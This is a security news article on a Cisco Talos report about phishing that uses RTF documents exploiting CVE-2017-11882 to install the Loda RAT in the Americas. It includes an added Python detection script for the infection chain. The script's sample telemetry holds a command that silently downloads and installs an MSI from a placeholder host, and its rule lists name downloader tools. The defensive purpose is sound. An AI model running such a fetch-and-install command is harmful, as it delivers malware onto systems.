Phishing campaign targets Americas with new variant of Loda RAT


Researchers have observed a new malware campaign that's been targeting the U.S., Argentina, Brazil and Costa Rica with an updated variant of the Loda RAT remote access trojan.

In a company blog post on Wednesday, Cisco Talos said that since at least the last quarter of 2019, the campaign has been using malicious websites to host malicious documents that are used in a multi-step infection chain designed to bypass email filters and deliver Loda version 1.1.1.

This new version of Loda functions similarly to previous iterations, but with a few notable differences, Talos states. The changes include a new form of string encoding for obfuscation, multiple persistence mechanisms to help the malware survive reboots, and the use of Windows Management Instrumentation (WMI) to enumerate the antivirus solutions running on the victim machine. Because of the campaign's obfuscation techniques, detection rates have so far been low, the blog post adds.

The perpetrators' attack vector has been phishing emails, including one email shown in the blog post that was written in Spanish and posed as an urgent reservation request. The emails carry an attached first-stage document, which points to a secondary document saved in Rich Text Format (RTF). The secondary document includes an obfuscated OLE object that exploits CVE-2017-11882, a code execution vulnerability in Microsoft Office, to download and execute an MSI file containing Loda.
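The delivery chain above (RTF, OLE object, CVE-2017-11882, then an MSI fetched and run) leaves a characteristic parent/child process pattern on the endpoint. The following detection sketch is an added example, not code from the article or from Talos; it assumes Sysmon-style process creation events with the field names shown, and the sample events are constructed.

```python
"""Flag process-creation events consistent with the Loda delivery chain.
CVE-2017-11882 lives in Microsoft Equation Editor (EQNEDT32.EXE), which in normal
use never launches child processes; an installer or downloader spawned by it, or by an
Office host process, is worth alerting on. Field names and sample events are constructed."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
INSTALLER_OR_DOWNLOADER = {"msiexec.exe", "powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe"}


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    cmdline: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_reason(ev: ProcEvent) -> Optional[str]:
    """Return a human-readable reason if the event matches, else None."""
    parent, child, cmd = _basename(ev.parent_image), _basename(ev.image), ev.cmdline.lower()
    if parent == "eqnedt32.exe":
        # Equation Editor spawning anything at all is the CVE-2017-11882 signature.
        return f"eqnedt32.exe spawned {child}"
    if parent in OFFICE_PARENTS and child in INSTALLER_OR_DOWNLOADER:
        return f"{parent} spawned {child}"
    if child == "msiexec.exe" and ("http://" in cmd or "https://" in cmd):
        # msiexec pulling a package straight from a URL, regardless of parent.
        return "msiexec installing from remote url"
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for every event that matches a rule."""
    hits = []
    for ev in events:
        reason = suspicious_reason(ev)
        if reason:
            hits.append((ev.pid, reason))
    return hits


# Constructed sample telemetry: one benign Word launch, the DCOM-started Equation
# Editor, the malicious msiexec child, and a legitimate service-started msiexec.
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Program Files\Microsoft Office\WINWORD.EXE", r"C:\Windows\explorer.exe", "winword.exe invoice.rtf"),
    ProcEvent(2, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", r"C:\Windows\System32\svchost.exe", "eqnedt32.exe -Embedding"),
    ProcEvent(3, r"C:\Windows\System32\msiexec.exe", r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "msiexec /i http://example.invalid/update.msi /q"),
    ProcEvent(4, r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\services.exe", "msiexec /V"),
]

if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: {reason}")
```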

Written in AutoIT, Loda dates back to 2017 and is typically used to spy on victims, owing to its ability to steal browser-stored usernames, passwords and cookies; perform keylogging; and covertly record audio and take screenshots.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
